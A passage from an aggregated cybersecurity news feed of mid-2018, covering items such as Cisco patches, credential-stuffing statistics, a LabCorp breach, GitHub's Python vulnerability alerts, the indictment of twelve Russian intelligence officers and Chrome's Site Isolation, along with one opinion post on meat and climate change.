Cisco also reported a high severity DoS vulnerability that affects Nexus 9000 series Fabric switches, the issue resides in the implementation of the DHCPv6 feature.

Cisco fixed all the vulnerabilities and confirmed that none of them has been exploited in attacks in the wild.

Pierluigi Paganini

(Security Affairs – Cisco Policy Suite, security)

The post Cisco fixes critical and high severity flaws in Policy Suite and SD-WAN products appeared first on Security Affairs.

Hackers Account For 90 Percent of Login Attempts At Online Retailers

Hackers account for 90% of of e-commerce sites' global login traffic, according to a report by cyber security firm Shape Security. They reportedly use programs to apply stolen data acquired on the dark web -- all in an effort to login to websites and grab something of value like cash, airline points, or merchandise. Quartz reports: These attacks are successful as often as 3% of the time, and the costs quickly add up for businesses, Shape says. This type of fraud costs the e-commerce sector about $6 billion a year, while the consumer banking industry loses out on about $1.7 billion annually. The hotel and airline businesses are also major targets -- the theft of loyalty points is a thing -- costing a combined $700 million every year. The process starts when hackers break into databases and steal login information. Some of the best known "data spills" took place at Equifax and Yahoo, but they happen fairly regularly -- there were 51 reported breaches last year, compromising 2.3 billion credentials, according to Shape. Taking over bank accounts is one way to monetize stolen login information -- in the US, community banks are attacked far more than any other industry group. According to Shape's data, that sector is attacked more than 200 million times each day. Shape says the number of reported credential breaches was roughly stable at 51 last year, compared with 52 in 2016. The best way consumers can minimize these attacks is by changing their passwords.

Read more of this story at Slashdot.

New Gmail feature could open more users to phishing risks: Government officials

Google is rolling out a sweeping redesign of its popular Gmail service, but federal cybersecurity authorities warn that a key new feature on the system could make its 1.4 billion users more susceptible to dangerous phishing attacks that compromise users’ vital personal information.

View Full Story

ORIGINAL SOURCE: ABC News

The post New Gmail feature could open more users to phishing risks: Government officials appeared first on IT SECURITY GURU.

Hackers Breach Network of LabCorp, US’ Biggest Blood Testing Laboratories

LabCorp, the US’ biggest blood testing laboratories network, announced on Monday that hackers breached its IT network over the weekend. “At this time, there is no evidence of unauthorized transfer or misuse of data,” the company said. “LabCorp has notified the relevant authorities of the suspicious activity and will cooperate in any investigation.”

View Full Story

ORIGINAL SOURCE: Bleeping Computer

The post Hackers Breach Network of LabCorp, US’ Biggest Blood Testing Laboratories appeared first on IT SECURITY GURU.

Alert Logic announces industry-first container security capabilities

Alert Logic, the leading provider of Security-as-a-Service solutions, today announced at the AWS Summit, New York, the industry’s first network intrusion detection system (IDS) for containers, available in Alert Logic Cloud Defender and Threat Manager solutions. This innovation brings organisations powerful new capabilities to inspect network traffic for malicious activity targeting containers, and faster detection of compromises to enhance the security of workloads running on the AWS Cloud.

The Alert Logic network IDS capability supports containers deployed on AWS including Docker, Amazon Elastic Container Service, Kubernetes, CoreOS, and AWS Elastic Beanstalk. Support for additional cloud-deployed containers will be available before the end of the year. The Alert Logic incident console can also now display which containers and hosts might be compromised along with the associated metadata.

Containers enable organisations to leverage the low overhead, power, agility, and security of virtualization with the improved benefit of portability. While the container market is growing fast given these benefits, with an estimated CAGR of 40% through 2020 according to 451 Research, many businesses have delayed container adoption and the related cost and time benefits due to security concerns. Until now, the security industry hasn’t provided the critical ability to inspect the network traffic that targets containers.

“Without real-time detection capabilities, attackers and intruders can lurk within containers installing trojans, malware, ransomware and cryptominers or even corrupting and exfiltrating data,” said Chris Noell, Senior Vice President, Engineering at Alert Logic. “Network intrusion detection is critical to providing the visibility into container attacks that other approaches miss. With Alert Logic, organisations can confidently move forward with their container deployments knowing that they are protected by the only security solution in the market that addresses container visibility at the network layer.”

Customers and Partners Adopt New Network IDS Capabilities for Containers

Accesso Technology, a best-in-class eCommerce, point of sales and ticketing solution provider, helps its clients increase sales and streamline operations and is an early adopter of Alert Logic’s container security innovation.

“As Accesso continues to focus on our industry-leading technology and security infrastructure, we need to ensure our containerized environment is protected without introducing additional complexity,” said William DeMar, Director, Information Security, Accesso Technology. “With Alert Logic, we have extended IDS security monitoring and detection to the container level and have gained more granular visibility into our container environments across multiple cloud platforms. Alert Logic partnered with us to get up and running quickly, and their team of security analysts and consultants proactively escalates incidents so we can prioritise our team’s efforts.”

Wealth Wizards is another Alert Logic customer using the new network IDS capability for containers. “We’re writing products our financial services clients want today, which means we need to build software really quickly,” said Richard Marshall, Head of Platform, Wealth Wizards. “We run in a 100% container environment, using Kubernetes and Docker. Security is a big priority for us, but we need to keep our engineering team focused on delivering the best experience for our clients. With Alert Logic we can concentrate on our core business while being safe in the knowledge we have security experts covering the operational side for us.”

Logicworks, a cloud automation and managed services company, partners with Alert Logic and has extended network IDS for containers capabilities to its customers. “Although container technology is relatively new, it’s already a ‘go to’ code deployment strategy for Logicworks,” said Steven Zeller, Vice President, Product Marketing for Logicworks. “Containers help our customers work smarter, and Logicworks ensures that our customers’ containers run securely and efficiently on AWS. Alert Logic’s container security solutions give our customers confidence in the continuous security of their cloud infrastructure.”

Products + Services Approach

The Alert Logic container security solutions work by analysing the signature of data packets as they traverse the container environment to detect cyberattacks in real-time and provide a graphical representation of the compromised container and its relationships. The intrusion detection capabilities for containers are fully managed by Alert Logic’s 24×7 security and compliance experts in the company’s Security Operations Centers. When a container threat is detected, Alert Logic’s security experts prioritise the threat, proactively escalate within 15-minutes, provide visual context, and offer remediation advice for customers.

The post Alert Logic announces industry-first container security capabilities appeared first on IT SECURITY GURU.

Be Ready to Fight new 5G Vulnerabilities

In the evolving landscape of mobile networks, we are beginning to see new vulnerabilities open up through 3G and 4G networks, and it is more than likely that 5G will follow this same fate. Protecting only this Gi Interface is no longer enough for service provider security.

 

Until recently, the Gi-LAN connecting the EPC (Evolved Packet Core) to the internet was considered to be the most vulnerable part of the service provider network and was protected via Gi-Firewal and anti DDoS systems. The rest of the EPC links were considered difficult targets for hackers because advanced vendor-specific knowledge was required for a successful attack. Since the typical hacker prefers a soft target, defensive measures weren’t a priority for developers or carriers. Network complexity was a defence in itself.

 

However, the requisite know-how to attack EPC from other interfaces is now becoming much more common. The mobile endpoints are being infected at an alarming rate, and this means that attacks can come in from the inside of the network. The year 2016 saw a leap in malware attacks, including headline-makers GooliganPegasus, and Viking Horde. Then the first quarter of 2017 saw a leap in mobile ransomware attacks, which grew by 250 percent.

 

The need for securing the EPC is tied to advances like LTE adoption and the rise of IoT, which are still gaining speed. LTE networks grew to 647 commercial networks in 2017, with another 700 expected to launch this year. With the adoption of LTE, IoT has become a reality—and a significant revenue stream for enterprises, creating a market expected to reach £400 billion by 2022. The time to take a holistic approach to securing the service provider networks has arrived.

There are three primary data paths connecting mobile service providers to the outside world. The first of these is a link to the internet through S/Gi LAN. Next is a link to a partner network that serves roaming users. Last, there is a link for traffic coming from towers. The security challenges and the attack vectors are different on each link. Until recently, the link to the internet was the most vulnerable point of connectivity. DDoS attacks frequently targeted the service provider’s core network on the Gi Link. These attacks were generally volumetric in nature and were relatively easy to block with highly scalable firewalls and DDoS mitigation systems.

 

The Expanding Attack Surface

The threat landscape is rapidly changing, and attacks can come from other points of connectivity. This has been theoretical until recently; while numerous academic research papers have been published in the past decade suggesting that attacks from partner networks or radio access networks (RANs) were a possibility, those threats are no longer merely an intellectual exercise: they are real. At the same time, the rapid rise of IoT is exposing the threat of malicious actors taking control and weaponising devices against a service provider.

 

Multiple botnets, such as WireX and its variants, have been found and taken down. So far, these attacks have targeted hosts on the internet, but it’s just a matter of time until they start attacking Evolved Packet Core (EPC) components.

 

There are multiple weak points in EPC and its key components. Components that used to be hidden behind proprietary and obscure protocols now reside on IP, UDP, or SCTP, which can be taken down using simple DoS attacks.

 

The attack surface is significantly larger than it used to be, and legacy approaches to security will not work.

 

A DDoS Attack, like a signaling storm, against an individual entity can be generated by a malicious actor or even a legitimate source. For example, a misbehaving protocol stack in an IoT device can cause an outage by generating a signaling storm.

 

Securing the SP Network

 

To secure the SP Network, businesses must improve their defences against DDoS attacks. The best way to achieve this is by utilising an S/Gi Firewall solution and a DDoS mitigation solution. TPS should also be deployed in your enterprises’ IT Security on-premise and cloud infrastructures. With all of these solutions in place it becomes easier to mitigate multi-terabit attacks.

 

Utilising powerful tools that can improve these defences, can help detect and mitigate, or stop, a number of advanced attacks specifically against EPC. The tools being used should also allow for a granular deep packet inspection to protect against user impersonation by means of spoofing, network impersonation, and signalling attacks to security professionals.

 

To summarise, in addition to mitigating and stopping terabit-scale attacks coming from the internet and utilising stateful firewall services, it is imperative for enterprises to up their security measures by using full-spectrum security that protect the whole infrastructure of your business.

 

The post Be Ready to Fight new 5G Vulnerabilities appeared first on IT SECURITY GURU.

SN 672: All Up in Their Business

This week we look at even MORE, new, Spectre-related attacks, highlights from last Tuesday's monthly patch event, advances in GPS spoofing technology, GitHub's welcome help with security dependencies, Chrome's new (or forthcoming) "Site Isolation" feature, when hackers DO look behind the routers they commandeer, the consequences of deliberate BGP routing misbehavior... and reading between the lines of last Friday's DOJ indictment of the US 2016 election hacking by 12 Russian operatives -- the US appears to really have been "all up in their business."

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Bandwidth for Security Now is provided by CacheFly.

Sponsors:

Radware Blog: The Evolving Network Security Environment – Can You Protect Your Customers in a 5G Universe?

Smart Farming depends on internet of things (IoT) devices and sensors to monitor vast farm fields, guiding farmers’ decisions about crop management through rich data. But it only takes one security flaw for all stakeholders within the ecosystem to be impacted. If hackers gain access to a single sensor, they can navigate their way to […]

The post The Evolving Network Security Environment – Can You Protect Your Customers in a 5G Universe? appeared first on Radware Blog.



Radware Blog

ENCRYPT Act: Consumer Privacy Vs Law Enforcement Data Access

The Consumer Technology Association (CTA) is supporting the proposed ENCRYPT ACT which forbids the manufacturers of the technology to weaken

ENCRYPT Act: Consumer Privacy Vs Law Enforcement Data Access on Latest Hacking News.

BSidesLV Preview: Planning For The Worst, and Watch Out For That Bus!

Bad circumstances happen to us and our technology. Fire, flood, sickness, and death can surprise us, our families, and our technology. While we may not be able to control all aspects of life, we can be prepared. At any time, you might metaphorically get hit by a bus. While I felt that I had reasonable […]… Read More

The post BSidesLV Preview: Planning For The Worst, and Watch Out For That Bus! appeared first on The State of Security.

Two thirds embarrassed by their out of date tech

A study of 1000 UK adults, carried out in May 2018, showed that the main reason people upgrade their smartphone is due to the embarrassment of having an older handset, rather than the desire to have the latest tech.

 

Despite mobile technology drastically improving in recent years, the research, by Satsuma Loans, revealed that 63% of respondents would be embarrassed if their peers saw them using a handset that was more than a couple of years old, and this would impact their decision to upgrade more than their desire to have new features.

 

When it comes to which age group feel most embarrassed by their out of date tech, surprisingly more respondents aged 45-54 admitted to feeling embarrassed by their phone than any other age group.

 

According to the study, the top five reasons for upgrading are:

 

Embarrassment of using an old handset (63%)

Peer pressure to fit in with others (59%)

Desire to always have the latest tech (51%)

Coming to the end of a phone contract (43%)

Desire to have a specific new feature (27%)

 

Looking at how often people involved in the study upgrade their phone, the majority (61%) upgrade each time they reach the end of their current contact, however 14% admitted they try to upgrade every six months – spending over £1000 a year on their mobile phone handset.

 

At the other end of the scale, one in ten adults surveyed stated that they believe smartphones are a waste of money and are happy with a basic handset. As well as the initial cost of the phone handset and monthly contract payments, there are also a number of hidden costs associated with owning a smartphone.  Hidden costs to consider are:

  • Insurance – insurance for top of the range phones can be as high as £14.99 per month
  • Cases, covers and screen protectors – without them you could be looking at a hefty bill for fixing a smashed handset after an accident
  • Cloud storage and backups – if you don’t back up you risk losing all of your precious photos and videos if you lose or damage your handset
  • Anti-virus protection – even the most tech-savvy can be caught out by malware

The post Two thirds embarrassed by their out of date tech appeared first on IT SECURITY GURU.

Securing real-time payments with tokenization

For banks, direct debit (ACH) fraud represents a bigger financial risk than card fraud. In particular, growing momentum for real-time payment schemes across the world is creating huge opportunities for fraudsters and placing increasing pressure on banks and clearing houses, who now have only seconds instead of days to identify fraudulent transactions.

There are various security approaches available to banks in the fight against fraud, but tokenization has already proved successful in protecting in-store and online card payments, with all the major payment systems, digital wallets and original equipment manufacturers adopting the technology.

By replacing unique sensitive information or data with a context-specific proxy, tokenization can significantly reduce the risk and impact of account-based fraud and foster safe, secure real-time payment initiatives across the world.

Adding tokenization to the real-time security mix

Financial institutions already deploy various techniques to prevent and mitigate ACH fraud.

Banks coordinate with agencies such as OFAC (Office of Foreign Assets Control) in the US and OFSI (Office of Financial Sanctions Implementation) in the UK to share intelligence and monitor suspicious entities or actions.

At a more practical level, out of pattern activity identifies irregular or unusual transactions, transaction limits help prevent high-value fraud, and ACH block services aim to root out unauthorized senders and recipients.

But it is old-fashioned manual review that continues to be a mainstay of bank processes. According to research from the Federal Reserve Bank of Minneapolis, 83% of banks in the US use this as a primary line of defense. This is simply not compatible with real-time payments and banks recognize the inherent limitations, with 43% per cent admitting it was “somewhat effective or ineffective”.

Tokenization is not a silver bullet. Rather, it is a process that should be considered as complementary to all existing anti-fraud measures, adding another robust layer of security and bringing unique benefits.

Mitigating account-based fraud

It is a hostile world, and for many organisations data breaches are more a case of ‘when’, not ‘if’.

Payment account tokenization mitigates the impact of data breaches when they are attempted, as sensitive account information is not stored in its raw form. This reduces the risk of stolen account numbers being used to commit transactional fraud, for example.

Similarly, control parameters limit how tokens can be used. So, if a token can only be used to pay a monthly direct debit to a specific merchant, it cannot then be used fraudulently to perform several person-to-person transactions on the same day.

Importantly, as an underlying single account credential can have multiple tokens associated with it supporting specific use-cases, banks can tailor the controls and limits they wish to put in place. If one is compromised, it can be quickly and easily replaced without impacting the main account credential or other associated tokens.

Faster, safer, easier

Tokenization as a technology is suitable to support multiple payment use cases via a single system, ensuring emerging commercial models and the ability to adapt to new requirements are not constrained by an inflexible security framework.

Also, tokens route normally through the payments systems and networks, so consumers and businesses can send and accept payments as normal with no change in authorizations. Depending on the system and token usage, tokens can be formatted and validated in the same way as the original credential, allowing non-disruptive use in an existing ecosystem to enable the swift onboarding of member financial institutions. And for new services, the token format can be simplified for frictionless use by the consumer.

For payment account tokenization to be effective, however, the infrastructure must be implemented at a systemic level.

This means Central Banks and Automated Clearing Houses have a crucial role to play in tokenizing the account numbers and managing the token vault – the centralized and highly secure server where the issued tokens and the account numbers they represent are stored.

Account-based tokenization beyond security

The main aim of tokenization is to protect account credentials to increase security.

There is an opportunity for banks, though, to take a wider view on the strategic use and potential of tokenization. Account-to-account based payment services, such as mobile payments and P2P, are increasingly popular following the introduction of regulation such as PSD2. Banks can use tokenization as a means to build stronger trust with customers through the provision of ever-simpler and seamless account-to account payments.

 

The post Securing real-time payments with tokenization appeared first on IT SECURITY GURU.

Organisations need a zero trust model for cyber security, Unisys survey finds

New research from Unisys Corporation found that IT professionals reported three incidents on average where sensitive information had been lost last year, with some respondents reporting 11 losses for the year. Respondents also reported an average of nine incidents per month where they had to address highly severe security issues.

The survey, conducted by information insights company Information Services Group Inc. (ISG), asked 404 enterprise IT professionals in North America, Europe and Asia Pacific to assess their security operations. The findings illustrate high levels of awareness among respondents of their challenges as well as the need to establish digital trust with their customers as they transform their businesses to cloud and mobile platforms.

As a result of these findings, ISG is forecasting that 60 percent of businesses globally will suffer a major service failure due to the new security issues introduced by shifting workloads to the cloud and enabling mobile and remote employees. The research indicates that between 2016 and 2020, on-premises workloads will decline from 55 percent to 20 percent of all workloads.

To address the challenges associated with digital trust, Unisys recommends the adoption of the “zero trust” model – an approach to security that recognizes threats emanate not only from outside the perimeter, but also from malicious insiders within trusted zones. The zero trust approach of granting least privileged access to all users requires a combination of microsegmentation and security services such as security information and event management (SIEM), endpoint protection and risk assessment, eliminating the need to buy new gear, rip and replace or add complexity to an already unwieldy architecture.

“In the era of digital transformation, security professionals recognize that digital trust is table stakes – a requirement that, if not met and delivered as part of the experience for stakeholders of the enterprise’s value chain, will upend organizations everywhere,” said Doug Saylors, research director, ISG. “Enterprises that are first to adopt and leverage digital trust fabrics will realize competitive advantages driven by combinations of deeper customer intimacy, operational excellence and product leadership.”

The survey showed that IT professionals recognize the need to address threats coming from outside their enterprises as well as the need to create security-focused cultures within them.

When asked to choose from among 12 IT security challenges at their enterprises, the top challenge was “external threats,” selected by 43 percent of respondents. It was followed by security challenges related to 24×7 operations (selected by 36 percent) and challenges related to legacy technologies (selected by 34 percent).

“Trust in digital business is earned during every digital interaction with the enterprise,” said Tom Patterson, chief trust officer at Unisys. “This means establishing strong bonds of trust throughout their ecosystems of employees, partners, suppliers and customers. By operating resistant and resilient systems, establishing trusted identities, and focusing passionately on client success, it is possible to make trust your critical success factor.”

Unisys Security Solutions protect critical assets by establishing digital trust and providing secure access to trusted users. Unisys solutions help enterprises reduce their attack surface, easily comply with regulations and simplify the complexity of today’s network security. Combining expert consultants, advanced software and managed security services, Unisys helps enterprises build security into the fabric of their digital transformation.

The post Organisations need a zero trust model for cyber security, Unisys survey finds appeared first on IT SECURITY GURU.

Code hosting service GitHub can now scan also for vulnerable Python code

The code hosting service GitHub added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.

Good news for GitHub users, the platform added Python to the list of programming languages that it is able to auto-scan for known vulnerabilities.

In March, the code hosting service GitHub confirmed that the introduction of GitHub security alerts in November allowed obtaining a significant reduction of vulnerable code libraries on the platform.

Github alerts warn developers when including certain flawed software libraries in their projects and provide advice on how to address the issue.

Last year GitHub first introduced the Dependency Graph, a feature that lists all the libraries used by a project. The feature supports JavaScript and Ruby, and the company announced to add the support for Python within the year.

GitHub Security Alerts

The GitHub security alerts feature introduced in November is designed to alert developers when one of their project’s dependencies has known flaws. The Dependency graph and the security alerts feature have been automatically enabled for public repositories, but they are opt-in for private repositories.

The availability of a dependency graph allows notifying the owners of the projects when it detects a known security vulnerability in one of the dependencies and suggests known fixes from the GitHub community.

An initial scan conducted by GitHub revealed more than 4 million vulnerabilities in more than 500,000 repositories. Github notified affected users by December 1, more than 450,000 of the vulnerabilities were addressed either by updating the affected library or removing it altogether.

Vulnerabilities are in a vast majority of cases addressed within a week by active developers.

With the support of a Python language, developers will have the opportunity to receive alerts also for their code written in this powerful programming language.

“We’re pleased to announce that we’ve shipped Python support. As of this week, Python users can now access the dependency graph and receive security alerts whenever their repositories depend on packages with known security vulnerabilities.” reads the announcement published by GitHub quality engineer Robert Schultheis.

“We’ve chosen to launch the new platform offering with a few recent vulnerabilities. Over the coming weeks, we will be adding more historical Python vulnerabilities to our database. Going forward, we will continue to monitor the NVD feed and other sources, and will send alerts on any newly disclosed vulnerabilities in Python packages.”

The company confirmed that the scanner is enabled by default on public repositories, while for private repositories the maintainers need to opt into security alerts, or by giving the dependency graph access to the repo from the “Insights” tab.

Pierluigi Paganini

(Security Affairs – hacking, secure coding)

The post Code hosting service GitHub can now scan also for vulnerable Python code appeared first on Security Affairs.

Researchers Mount Successful GPS Spoofing Attack Against Road Navigation Systems

Academics say they’ve mounted a successful GPS spoofing attack against road navigation systems that can trick humans into driving to incorrect locations. The research is of note because previous GPS spoofing attacks have been unable to trick humans, who, in past experiments, often received malicious driving instructions that didn’t make sense or were not in sync with the road infrastructure —for example taking a left on a straight highway.

View Full Story

ORIGINAL SOURCE: Bleeping Computer

The post Researchers Mount Successful GPS Spoofing Attack Against Road Navigation Systems appeared first on IT SECURITY GURU.

UN agency tasks member states on greater attention to cyber security

Babcock International Model United Nations (BIMUN) has urged member states to pay more attention to cyber security and broaden its definition beyond hacking to enhance implementation of broader solutions. It stated this at the simulation of the UN General Assembly First Committee on Disarmament and International Security (DISEC), during the second BIMUN conference, organised by Babcock University, Ilishan Ogun State, in collaboration with the United Nations Information Centre (UNIC), Lagos at the weekend.

View Full Story

ORIGINAL SOURCE: Guardian

The post UN agency tasks member states on greater attention to cyber security appeared first on IT SECURITY GURU.

Passwords For Tens of Thousands of Dahua Devices Cached In IoT Search Engine

An anonymous reader writes: "Login passwords for tens of thousands of Dahua devices have been cached inside search results returned by ZoomEye, a search engine for discovering Internet-connected devices (also called an IoT search engine)," reports Bleeping Computer. A security researcher has recently discovered that instead of just indexing IoT devices, ZoomEye is also sending an exploitation package to devices and caching the results, which also include cleartext DDNS passwords that allow an attacker remote access to these devices. Searching for the devices is trivial and simple queries can unearth tens of thousands of vulnerable Dahua DVRs. According to the security researcher who spotted these devices, the trick has been used in the past year by the author of the BrickerBot IoT malware, the one who was on a crusade last year, bricking unsecured devices in an attempt to have them go offline instead of being added to IoT botnets.

Read more of this story at Slashdot.

Trump might ask Putin to extradite the 12 Russian intelligence officers

A few hours before the upcoming meeting between Donald Trump and Vladimir Putin, the US President said he might ask the extradition to the US of the 12 Russian intelligence officers accused of being involved in attacks against the 2016 presidential election.

Ahead of the Trump-Putin meeting in Helsinki on Monday, the US President announced that he may ask the extradition of the 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.

Trump will meet with Putin in Finland, despite calls from Democratic lawmakers to cancel the summit in light of indictments.

Journalist asked Trump whether he would request the extradition to the US of the Russian intelligence officers accused of hacking Hillary Clinton‘s presidential campaign, and the reply was clear

“Well, I might.” Trump said

“I hadn’t thought of that. But I certainly, I’ll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration.”

Trump confirmed that Russian hackers targeted the 2016 Presidential election, but denied that they supported his campaign, he added that his Republican Party had also been hit by Russian hackers.

“I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked,” he said. “They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But — and this may be wrong — but they had much stronger defenses.”

The President blamed the DNC for poor security of its systems.

“The President then placed blame on Democrats for “allowing” the data and security breaches that led to Russia’s tampering in the election, saying the Democratic National Committee was ill-equipped to handle a cyberattack from a foreign actor. The Republican National Committee, on the other hand, had “much better defenses,” Trump claimed.” reported the CNN.
“They were doing whatever it was during the Obama administration,” Trump said of the Russians. “And I heard that they were trying, or people were trying, to hack into the RNC too, the Republican National Committee, but we had much better defenses. I’ve been told that by a number of people, we had much better defenses so they couldn’t. I think the DNC should be ashamed of themselves for allowing themselves to be hacked. They had bad defenses, and they were able to be hacked, but I heard they were trying to hack the Republicans too, but, and this may be wrong, but they had much stronger defenses.”

The attempts of hacking of “old emails” of the Republican National Committee was first reported by the CNN in January last year when it quoted the then-FBI Director James Comey.

Comey told a Senate panel that “old emails” of the Republican National Committee had been the target of hacking, but the material was never publicly released. Comey confirmed that there was no evidence the current RNC or the Trump campaign had been successfully hacked.

Trump admitted that he was going to meet Putin with “low expectations.”

“I’m not going with high expectations,” he added.

“I think it’s a good thing to meet,” he said. “I believe that having a meeting with Chairman Kim was a good thing. I think having meetings with the president of China was a very good thing.”

“I believe it’s really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out.”

Pierluigi Paganini

(Security Affairs – Trump-Putin meeting, hacking)

The post Trump might ask Putin to extradite the 12 Russian intelligence officers appeared first on Security Affairs.

Meat is Murder on the Environment

After decades of seeing activists lay out the obvious economics of meat, and reading research by economists confirming the obvious, it looks as if the market finally is shifting. Eating meat is by far the number one impact to climate change and executives are starting to execute on the meatless menu.

It always has seemed weird to me that if you wanted to remove meat from your work meals, or airplanes for that matter, you had to check a special box. Really it should be the other way around. If someone wants to add meat, let them be the “special” case.

please check box if you want a major global catastrophic impact from your meal

Makes little to no sense to have meat as a default, and people should have to choose to accelerate global destruction, rather than set it as the mindless default. Not saying I would never check the box, or there would never be need for meat, just that I would always want the default to be meatless. When I say make it rare I mean it both ways. The economics of why are obvious, as I will probably say continuously and forever.

For example, years ago I was running the “Global Calculator” created for economic modeling, and reducing meat consumption undeniably had more impact than any other factors.

The Global Calculator is a model of the world’s energy, land and food systems to 2050. It allows you to explore the world’s options for tackling climate change and see how they all add up. With the Calculator, you can find out whether everyone can have a good lifestyle while also tackling climate change.

A sad and ironic side note here is the fact that meat consumption is the top factor in the “extinction crisis“, as 3/4 of earth’s animal population is disappearing at an alarming rate.

  1. climate change
  2. agriculture
  3. poaching
  4. pollution
  5. disease

I think it still may be counter-intuitive for a lot of folks that they should stop eating meat to reduce climate change to prevent extinction of animals. So if you really like meat you should stop eating it. Get it?

Thus a logical approach to solving many of the expensive problems people face today and into the future is to limit meat consumption within commercial space, because that’s where some expansive top-down decisions easily are made.

Imagine Google removing meat from its school-lunch-like program for its school-campus-like facilities for its school-children-like staff running its school-peer-review-like search engine. Alas, that probably means executive leadership (less like kids trying to stay in school forever) where someone issues a simple order to take a stand.

The first step on this path really should be Mar-a-Lago converts to vegan-only menus and becomes a research center for climate change, but I digress…

Instead it looks like Wework has apparently woke, and removed meat from its menus.

…told its 6,000 global staff that they will no longer be able to expense meals including meat, and that it won’t pay for any red meat, poultry or pork at WeWork events. In an email to employees this week outlining the new policy, co-founder Miguel McKelvey said the firm’s upcoming internal “Summer Camp” retreat would offer no meat options for attendees.

“New research indicates that avoiding meat is one of the biggest things an individual can do to reduce their personal environmental impact,” said McKelvey in the memo, “even more than switching to a hybrid car.”

It’s crazy to me that someone is calling out new research here when there is so much legacy work, but I guess that covers the question why they waited so long to do the right thing.

And just in case any of the typical extremist right-wing tech professionals (Shout out to the 303!) read this blog post, I offer this tasty morsel on vaccinating the mind against climate change falsehoods:

To find the most compelling climate change falsehood currently influencing public opinion, van der Linden and colleagues tested popular statements from corners of the internet on a nationally representative sample of US citizens, with each one rated for familiarity and persuasiveness.

The winner: the assertion that there is no consensus among scientists, apparently supported by the Oregon Global Warming Petition Project. This website claims to hold a petition signed by “over 31,000 American scientists” stating there is no evidence that human CO2 release will cause climate change.

The study also used the accurate statement that “97% of scientists agree on manmade climate change”. Prior work by van der Linden has shown this fact about scientific consensus is an effective ‘gateway’ for public acceptance of climate change.

Bring out the facts! Security professionals often ignore climate change harm and need facts as a gateway to accept climate change risks. Maybe a good time to impact self-proclaimed security elites could be when they head to Las Vegas this summer…observe them carelessly gorging themselves on meat while claiming to care about data and risk, and hand them an invite them to an exclusive WeWork party.

12 Russian Intel Officers charged of hacking into U.S. Democrats

The week closes with the indictment for twelve Russian intelligence officers by a US grand jury. The charges were formulated just three days before President Donald Trump is scheduled to meet with Vladimir Putin.

The special Counsel Robert Mueller, who indicted on February 13 Russians for a massive operation aimed to influence the 2016 Presidential election, now charged 12 Russian intelligence officers working under the GRU of carrying out “large-scale cyber operations” to steal Democratic Party documents and emails.

Deputy Attorney General Rod Rosenstein announced the indictment at a press conference in Washington.

“there’s no allegation in this indictment that any American citizen committed a crime.” said Rosenstein. “the conspirators corresponded with several Americans during the course of the conspiracy through the internet.”

However, “there’s no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers,”

During the news conference, the Deputy Attorney General Rod Rosenstein described the technical details of the operations conducted by the units of Russia’s GRU intelligence agency. The cyberspies stole emails from the Democratic National Committee and Hillary Clinton’s campaign, then leaked them in ways meant to influence the perception of Americans about the Presidential election.

Rosenstein reported a second operation in which the officers targeted the election infrastructure and local election officials. The Russian intelligence set up servers in the U.S. and Malaysia under fake names to run their operations, the agents used payment with cryptocurrency that had been “mined” under their direction.

“The fine details of Russian intelligence operations — the names of officers, the buildings where they worked and the computers they used to run phishing operations and make payments — suggest that prosecutors had an inside view aided by their own or another government’s intelligence apparatus.” reads an article published by Bloomberg.

Rosenstein also remarked that “there’s no allegation that the conspiracy changed the vote count or affected any election result.”

Rosenstein also announced that Trump was informed about the indictment before the announcement and that the timing was determined by “the facts, the evidence, and the law.”

The Deputy Attorney General, confirmed that 11 of the Russians indicted were charged with “conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.”

“One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections,” he added.

“The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016,” 

“They also hacked into the computer networks of a congressional campaign committee and a national political committee.”

The minority at the US Government is pressing Trump to cancel the meeting with Putin because he intentionally interfered with the election to help Trump’s presidential campaign.

“These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win,” Senator Chuck Schumer, the Democratic Senate minority leader said in a statement.

“President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won’t interfere in future elections,”

Speaking on Friday, before the indictments were announced, Trump explained that he would ask Putin about the alleged interference of Russian intelligence in the Presidential election.

“I will absolutely, firmly ask the question, and hopefully we’ll have a good relationship with Russia,” Trump told a joint press conference with British Prime Minister Theresa May.

Trump described the Mueller investigation as a “rigged witch hunt,” and added that he has been “tougher on Russia than anybody.”

“We have been extremely tough on Russia,” 

Russian intelligence

Hillary Clinton and Donald Trump are tightening their grips on the Democratic and Republican presidential nominations.

Trump evidently believes that the hostility against Russia is a severe interference with the relationship and the collaboration between the two states.

Russia denies any involvement in the elections, and the Kremlin expelled 60 intelligence officers from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.

No Americans were charged Friday, but the indictment reports unidentified Americans were in contact with the Russian intelligence officers.

According to the indictment, there was at least a person close to the Trump campaign and a candidate for Congress that in contact the Russians officers.

Pierluigi Paganini

(Security Affairs – Russian Intelligence, Presidential election)

The post 12 Russian Intel Officers charged of hacking into U.S. Democrats appeared first on Security Affairs.

Chrome users get Site Isolation by default to ward off Spectre attacks

Site Isolation, the optional security feature added to Chrome 63 late last year to serve as protection against Spectre information disclosure attacks, has been enabled by default for all desktop Chrome users who upgraded to Chrome 67. How Site Isolation mitigates risk of Spectre attacks “In January, Google Project Zero disclosed a set of speculative execution side-channel attacks that became publicly known as Spectre and Meltdown. An additional variant of Spectre was disclosed in May. … More

The post Chrome users get Site Isolation by default to ward off Spectre attacks appeared first on Help Net Security.

Zero-Day Coverage Update – Week of July 9, 2018

